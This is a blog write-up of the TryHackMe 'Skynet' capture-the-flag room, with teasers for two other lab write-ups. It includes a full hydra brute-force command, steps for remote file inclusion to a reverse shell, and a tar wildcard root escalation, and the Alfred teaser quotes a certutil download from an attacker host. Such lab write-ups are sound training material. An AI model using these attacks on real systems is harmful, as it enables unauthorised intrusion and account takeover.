Skynet - THM - Braindump

January 2, 2022•366 words

There is a web server and samba running, automatically scan both using dirb and enum4linux.

The web page served is a useless search, nothing in the source code either.

There is anonymous listing enabled on the samba server, there are some directories to examine.

Dirb returned a login form exposed on a /squirrelmail directory, there is also a version number: 1.4.23

There is a known RCE for this version, but requires login credentials. Maybe we have a username (milesdyson) but password?

In the meanwhile, we can access two files only on the samba server, a message saying many passwords have been changed, so maybe it is an easy one to bruteforce? and we have some logs as well. Logs 2 and 3 are empty, but the first one seems like a wordlist, maybe we can bruteforce our squirrelmail login for milesdyson.

We bruteforce using

hydra -l milesdyson -P log1.txt 10.10.92.158 http-post-form  '/squirrelmail/src/redirect.php:loginusername=^{USER^{&secretkey=^{PASS^&js}}}autodetectresults=1&justlogged_in=1:Unknown user or password incorrect.'

It works like a charm and we have credentials to login, let's try to use that RCE...actually, before this, let's take a look inside the squirrelmail server, there is the smb password for milesdyson, and there we can find a reference to a hidden directory called 45kra24zxs28v3yd, let's check that out.

Running gobuster against it, there is an administrator login form revealing this is a Cuppa CMS. There is a known exploit that lets us include a remote file, we can include the php-reverse-shell and get a shell as www-data

Looking at the crontab, there is a tar running with shell expansion with root privileges, we just need to add two special files to /var/www/html to get a root shell, just add --checkpoint=1 and --checkpoint-action=exec=<command to run> in the directory.

Info steps:

Gathered a username, milesdyson
Squirrelmail 1.4.23
Bruteforce credentials using log1.txt, retrieved from SMB server
Read emails, find secret directory
Directory bust sub directories, find vulnerable CMS
Exploit with RFI, gain low level shell
Exploit tar running with shell expansion as root
Merry hacking

👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

Subscribe to the author

You'll only receive email when they publish something new.

More from emacab98
All posts

Alfred - THM - Braindump

January 1, 2022•198 words

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.Searching on Google, default is admin. Tried simple combinations, admin:admin worked.We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.We can use this command in the build:certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced....

Read post

Zeno - THM

January 7, 2022•394 words

At first, after a basic scan, there is only a 12340 TCP port open and SSH on 22. Connecting to it using netcat reveals this is an Apache 2.4.6 webserver, running on PHP 5.4.16.Using a directory scanner, we find out there is RMS installed on the webserver.In our manual scraping of the website, we can notice that, once we create an account, we get a sample message from an account called "administrator", and in the Contact Us section there is an email address that is registered to the domain pathfi...

Read post

Skynet - THM - Braindump

More from emacab98All posts

Alfred - THM - Braindump

Zeno - THM

More from emacab98
All posts